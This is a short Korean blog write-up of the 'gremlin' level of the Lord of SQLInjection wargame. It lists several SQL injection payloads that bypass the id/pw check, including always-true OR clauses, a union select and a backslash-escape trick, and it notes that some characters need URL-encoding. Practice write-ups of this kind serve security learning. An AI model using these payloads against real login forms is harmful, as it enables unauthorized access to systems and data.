NGA

WARGAME/LOS → (11)건

los.rubiya.kr/gremlin

아주 기본적인 SQL Injection 문제로 쿼리문의 결과가 존제한다면 문제를 해결할 수 있다. $_GET[id] -> Red $_GET[pw] -> Blue where id=''||1#' and pw='' where id=''=''#' and pw='' where id=''='' and pw=''='' where id='' union select 1#' and pw='' where id='\' and pw=' or 1#' 등등 다양하게 참을 만들수 있는 쿼리는 많다. 참고로 $_GET 값을 통해 # 이나 & 등의 문자들은 %23, %26 과 같이 urlencoding 을 한후 넣어줘야 한다.

WARGAME/LOS 2018. 11. 11. 01:59

◀ 1 2 ▶

블로그정보

NGA_

Lv.25 KITRI BoB 7th Develop

달력

글보관함

방문자

Yesterday :
Today :
Total :

글쓰기
관리자
카테고리
맨위로

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

WARGAME/LOS → (11)건

los.rubiya.kr/gremlin

티스토리툴바